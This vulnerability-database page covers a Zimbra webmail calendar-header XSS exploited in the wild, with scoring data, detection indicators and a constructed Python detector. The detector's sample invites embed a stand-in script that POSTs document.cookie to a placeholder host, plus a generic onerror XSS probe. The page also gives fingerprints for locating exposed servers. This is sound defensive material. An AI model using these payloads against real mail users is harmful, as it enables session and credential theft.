cbcvebase.
CVE-2024-27443
published 2024-08-12

CVE-2024-27443: An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the…

Priority: P2 · 78
Severity: medium, CVSS 3.1 base score 6.1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2025-06-09
Exploited in the wild
EPSS: 19.54% (97.0th percentile)
An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input validation in the handling of the calendar header. An attacker can exploit this via an email message containing a crafted calendar header with an embedded XSS payload. When a victim views this message in the Zimbra webmail classic interface, the payload is executed in the context of the victim's session, potentially leading to execution of arbitrary JavaScript code.

Affected

2 ranges
Vendor   Product        Version range         Fixed in
zimbra   collaboration
zimbra   collaboration  >= 10.0.0 < 10.0.7    10.0.7

Detection & IOCs (extracted from sources)

path: /js/zimbraMail/share/model/ZmSettings.js
other: X-Zimbra-Calendar-Intended-For (header used for XSS injection)
  • Detect exploitation attempts by monitoring for crafted calendar invite emails containing the X-Zimbra-Calendar-Intended-For header with embedded JavaScript (including base64-encoded payloads), as APT28 embedded a hidden script that decoded and executed base64 JavaScript when the invite was viewed.
  • Look for HTTP POST requests from Zimbra webmail sessions to hardcoded external C2 addresses — the malicious payload exfiltrates credentials, contacts, webmail settings, login history, 2FA data, and passwords via HTTP POST.
  • Detect invisible input fields injected into the Zimbra webmail DOM — the payload creates invisible input fields to trick browsers or password managers into autofilling stored credentials.
  • Use Shodan/FOFA fingerprints to identify exposed vulnerable Zimbra instances: favicon hashes 1624375939 and 475145467, and HTML body containing 'zimbra collaboration suite web client'.
  • Flag Zimbra Collaboration versions 9.0.0 (before P39) and >= 10.0.0 < 10.0.7 as vulnerable; version can be extracted from /js/zimbraMail/share/model/ZmSettings.js via the CLIENT_VERSION field.
  • The payload executes solely upon opening the malicious email — no clicks, redirections, or user input required — so email gateway inspection of calendar invite headers is critical for early detection.
  • The payload has no persistence — it only executes when the malicious email is opened, so forensic investigation should focus on email open events and associated outbound HTTP POST activity rather than persistent artifacts.
  • The Nuclei template detection method is passive/version-based only (checks ZmSettings.js for version string) and does not actively confirm XSS exploitability — it will flag any unpatched instance regardless of actual attack traffic.
  • Each malicious script has a slightly different set of capabilities adjusted per target product, meaning C2 addresses and payload structure will vary per campaign instance and cannot be universally fingerprinted from public reporting alone.
  • Affected versions span three patch branches: 8.8.15 (before P46), 9.0.0 (before P39), and 10.x (before 10.0.7) — detection rules scoped only to 9.x/10.x will miss 8.8.15 deployments.
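
The two checks above (a mail-gateway inspection of the X-Zimbra-Calendar-Intended-For header for inline or base64-wrapped JavaScript, and the passive CLIENT_VERSION check against the fixed versions) as a worked Python example. This is added here for illustration and is not code from the page's sources, from Zimbra, or from the Nuclei template; the sample invites and the ZmSettings.js fragments are constructed, and the registerSetting()/defaultValue layout and the _GA_ build suffixes are assumptions about the file format, not captured data.

```python
"""Constructed detection helpers for the two IOC classes listed above:
1. mail whose X-Zimbra-Calendar-Intended-For header carries inline or
   base64-wrapped JavaScript instead of an address, and
2. a ZmSettings.js body whose CLIENT_VERSION falls in 10.0.0 <= v < 10.0.7.
Sample mail and JS fragments are made up for the example; the registerSetting()
layout and the _GA_ build suffixes are assumptions about the file format.
"""
import base64
import binascii
import re
from email import message_from_string
from email.policy import default

HEADER = "X-Zimbra-Calendar-Intended-For"

# Tokens that have no business in a header meant to carry a mail address.
SCRIPT_MARKERS = re.compile(
    r"<\s*script|javascript:|on(?:error|load|focus|mouseover|click)\s*=|"
    r"\b(?:eval|atob|fetch|Function)\s*\(|document\.|window\.",
    re.IGNORECASE,
)
# A base64 run long enough to be a wrapped payload rather than a stray token.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
BARE_ADDRESS = re.compile(r"^[^@\s<>\"']+@[^@\s<>\"']+$")


def decode_base64_blobs(text):
    """UTF-8 text of every base64 run in `text` that decodes cleanly."""
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not real base64 (bad alphabet or padding)
        decoded.append(raw.decode("utf-8", "ignore"))
    return decoded


def inspect_header_value(value):
    """Findings for one header value; [] means it looks like an ordinary address."""
    findings = []
    if SCRIPT_MARKERS.search(value):
        findings.append("script markers in header")
    if any(SCRIPT_MARKERS.search(blob) for blob in decode_base64_blobs(value)):
        findings.append("base64 blob decodes to script")
    if not findings and not BARE_ADDRESS.match(value.strip()):
        findings.append("header value is not a bare address")
    return findings


def inspect_message(raw_message):
    """Check every occurrence of the header, so a duplicated header is not missed."""
    msg = message_from_string(raw_message, policy=default)
    findings = []
    for value in msg.get_all(HEADER, []):
        findings.extend(inspect_header_value(str(value)))
    return findings


def _invite(header_value):
    """Minimal constructed calendar invite carrying one instance of the header."""
    return (
        "From: alice@example.com\nTo: bob@example.com\nSubject: Planning sync\n"
        f"{HEADER}: {header_value}\n"
        "Content-Type: text/calendar; method=REQUEST\n\n"
        "BEGIN:VCALENDAR\nEND:VCALENDAR\n"
    )


BENIGN_INVITE = _invite("bob@example.com")
# Generic XSS probe string, not the payload used in the wild.
CRAFTED_INLINE = _invite("bob@example.com <img src=x onerror=alert(1)>")
# Constructed stand-in for a base64-wrapped exfiltration snippet.
PAYLOAD_JS = "fetch('https://collector.example/xx',{method:'POST',body:document.cookie});"
CRAFTED_B64 = _invite(base64.b64encode(PAYLOAD_JS.encode()).decode())

# --- passive version check against /js/zimbraMail/share/model/ZmSettings.js ---
VERSION_RE = re.compile(r"CLIENT_VERSION[^\n]*?(\d+\.\d+\.\d+)")


def classify_version(zm_settings_js):
    """Classify a ZmSettings.js body against the fixed versions named on this page."""
    m = VERSION_RE.search(zm_settings_js)
    if not m:
        return "unknown: no CLIENT_VERSION in input"
    version = tuple(int(p) for p in m.group(1).split("."))
    if (10, 0, 0) <= version < (10, 0, 7):
        return "vulnerable: 10.0.x before 10.0.7"
    if version >= (10, 0, 7):
        return "not in listed range: 10.0.7 or later"
    if version in ((9, 0, 0), (8, 8, 15)):
        # The triple does not carry the patch level, so P39 / P46 cannot be
        # confirmed from the JS alone; check the host with `zmcontrol -v`.
        return "verify patch level on host: needs 9.0.0 P39 / 8.8.15 P46"
    return "not in listed range"


# Constructed fragments; the exact layout and build suffixes are assumptions.
ZMSETTINGS_VULN = 'this.registerSetting("CLIENT_VERSION", {type:ZmSetting.T_CONFIG, defaultValue:"10.0.6_GA_4500"});'
ZMSETTINGS_FIXED = 'this.registerSetting("CLIENT_VERSION", {type:ZmSetting.T_CONFIG, defaultValue:"10.0.7_GA_4518"});'
ZMSETTINGS_9 = 'this.registerSetting("CLIENT_VERSION", {type:ZmSetting.T_CONFIG, defaultValue:"9.0.0_GA_4258"});'

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_INVITE), ("inline", CRAFTED_INLINE), ("base64", CRAFTED_B64)):
        print(name, inspect_message(raw))
    for js in (ZMSETTINGS_VULN, ZMSETTINGS_FIXED, ZMSETTINGS_9, ""):
        print(classify_version(js))
```

The header check deliberately treats anything that is not a bare address as worth a look, since a mail gateway sees far fewer false positives on this header than on the message body; the version check mirrors the passive nature of the Nuclei approach noted above and, for the 9.0.0 and 8.8.15 branches, reports that the patch level must be confirmed on the host rather than guessing.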

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     6.1    MEDIUM    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck           6.1    MEDIUM
cisa                6.1    MEDIUM